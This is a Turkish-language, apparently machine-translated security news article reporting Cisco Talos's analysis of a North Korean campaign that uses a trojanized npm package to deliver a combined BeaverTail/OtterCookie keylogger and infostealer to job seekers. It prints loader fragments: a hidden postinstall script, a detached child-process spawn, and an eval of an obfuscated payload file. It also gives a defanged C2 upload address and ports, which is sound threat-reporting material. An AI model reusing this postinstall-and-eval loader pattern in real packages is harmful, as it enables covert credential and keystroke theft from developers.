Kuzey Koreli Hackerlar Keylogging için BeaverTail ve OtterCookie’yi Birleştirerek Kötü Amaçlı Komut Dosyaları Kullanıyor


Kuzey Koreli Hackerlar Keylogging için BeaverTail ve OtterCookie'yi Birleştirerek Kötü Amaçlı Komut Dosyaları Kullanıyor

Chessfi adlı truva atı haline getirilmiş bir Node.js uygulamasıyla iş arayanları hedef alan yeni bir bilgi hırsızı ortaya çıktı.

Resmi depoda barındırılan değiştirilmiş bir npm paketi aracılığıyla sunulan kötü amaçlı yazılım, önceden ayrı olan iki aracı (BeaverTail ve OtterCookie) birleşik bir JavaScript yükünde harmanlıyor.

Kurbanlar sahte istihdam teklifleriyle kandırılıyor ve bir kodlama değerlendirmesi kisvesi altında uygulamayı yüklemeleri isteniyor; bu da bilmeden kimlik bilgilerini, kripto para cüzdanlarını ve kullanıcı etkinliklerini toplayan kötü amaçlı komut dosyalarını tetikliyor.

Cisco Talos analistleri, güvenliği ihlal edilmiş bir sistemden gelen olağandışı giden trafiği araştırırken kampanyayı tespit etti.

Node-nvm-ssh paketindeki kurulum sonrası komut dosyasının, büyük bir JavaScript yükünün gizliliğini kaldıran ve değerlendiren gizli bir alt süreç ürettiğini buldular.

Node-nvm-ssh enfeksiyon yolu (Kaynak – Cisco Talos)

Bu veri, BeaverTail’in tarayıcı uzantısı numaralandırmasını ve InvisibleFerret Python indiricisini OtterCookie’nin uzak kabuğu, dosya sızdırma, pano ve şimdi keylogging modülleriyle birleştirir.

google

Birleştirilen kötü amaçlı yazılım yürütüldükten sonra, soket.io üzerinden bir komut ve kontrol sunucusuyla bağlantı kurar.

Saldırgan uzaktan komutlar verebilir, çok çeşitli desenlerle eşleşen dosyaları çalabilir. .env Ve .docx kripto para birimi uzantı dizinlerine gidin ve kabuk komutlarını çalıştırın.

Bu arada, keylogging bileşeni her tuş vuruşunu yakalar ve bunları pano içeriğiyle birlikte C2 sunucusuna yüklemeden önce periyodik masaüstü ekran görüntülerini alır.

Sürekli ağ etkinliği

Etkilenen sistemler, yüksek numaralı TCP bağlantı noktalarında (genellikle Socket.io için 1418 ve keylog yüklemeleri için 1478) sürekli ağ etkinliği gösterir.

Kötü amaçlı yazılım, adlı geçici bir klasör oluşturur. windows-cache ve tuş vuruşlarını yazar 1.tmp her saniye, ekran görüntüleri şu şekilde kaydedilir: 2.jpeg her dört saniyede bir.

Node.js paketlerini kullanma node-global-key-listener, screenshot-desktop Ve sharpmodül, önemli olaylar için dinleyicileri yapılandırır ve ekran görüntüsü yakalamalarını planlar, ardından verileri paketleyip hxxp://172.86.88.188:1478/upload adresine gönderir.

Keylogger, klavye ve fare tuş vuruşlarını dinler ve bunları bir dosyaya kaydeder (Kaynak – Cisco Talos)

Kimlik bilgileri hırsızlığı ve uzak kabuk erişimine ek olarak, kampanyanın bulaşma mekanizması tespitten kaçınmak için çok aşamalı bir zincir kullanıyor. Depoyu klonladıktan sonra kötü amaçlı bir postinstall komut dosyası package.json yürütür skip senaryo:

"scripts": {
  "postinstall": "npm run test npm run transpile npm run skip"
}

skip komut çağırır node testfixtures/evalvarsayılan olarak yüklenen index.js. Bu komut dosyası, çalışan bağımsız bir alt süreci ortaya çıkarır file15.js:

const filePath = path.join(__dirname, 'node_modules', 'file15.js');
const child = spawn(process.execPath, [filePath], { detached: true, stdio: 'ignore' });

Nihayet, file15.js içeriğini okur ve değerlendirir test.list kullanarak evalbirleştirilmiş BeaverTail ve OtterCookie modüllerini ortaya koyuyor:

const fs = require('fs');
const path = require('path');
const filePath = path.join(__dirname, 'test.list');
fs.readFile(filePath, 'utf8', (err, data) => { eval(data); });

Git deposunun klonlanması, zararsız görünen npm komut dosyalarının çalıştırılması, gizli süreçlerin oluşturulması ve gizlenmiş bir veri yükünün dinamik olarak değerlendirilmesi gibi karmaşık zincir, karmaşık enfeksiyon mekanizmasının altını çiziyor.

Famous Chollima, BeaverTail’in gizli Python yük indiricisi ile OtterCookie’nin modüler bilgi hırsızını birleştirerek, şüphelenmeyen kurbanları tehlikeye atmak için tanıdık geliştirici iş akışlarından yararlanan çok yönlü bir kötü amaçlı yazılım geliştirdi.

Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.

googlehaberler



Source link